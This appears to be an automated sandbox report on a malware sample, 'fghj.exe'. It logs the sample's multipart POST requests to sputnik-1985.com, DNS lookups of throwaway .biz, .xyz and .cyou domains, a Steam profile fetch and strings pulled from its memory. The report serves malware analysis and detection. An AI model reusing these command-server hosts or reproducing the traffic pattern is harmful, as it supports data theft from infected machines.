              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QJOBUM86SESDBVW93User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5BM7KYTRHVLKF0TSQY4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20592Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDDJO2CL1PTZAMGOWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H5JU37N1HB6AHCSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1109Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: spellshagey.biz
              Source: global trafficDNS traffic detected: DNS query: immureprech.biz
              Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
              Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
              Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
              Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
              Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
              Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
              Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: fghj.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1613112719.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: fghj.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0
              Source: fghj.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0
              Source: fghj.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: fghj.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: fghj.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVE36.crt0#
              Source: fghj.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootE46.p7c0#
              Source: fghj.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: fghj.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: fghj.exeString found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_
              Source: fghj.exeString found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_.dir
              Source: fghj.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: fghj.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: fghj.exeString found in binary or memory: http://ocsp.sectigo.com0&
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steams
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.cohK
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publi0V
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer201
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
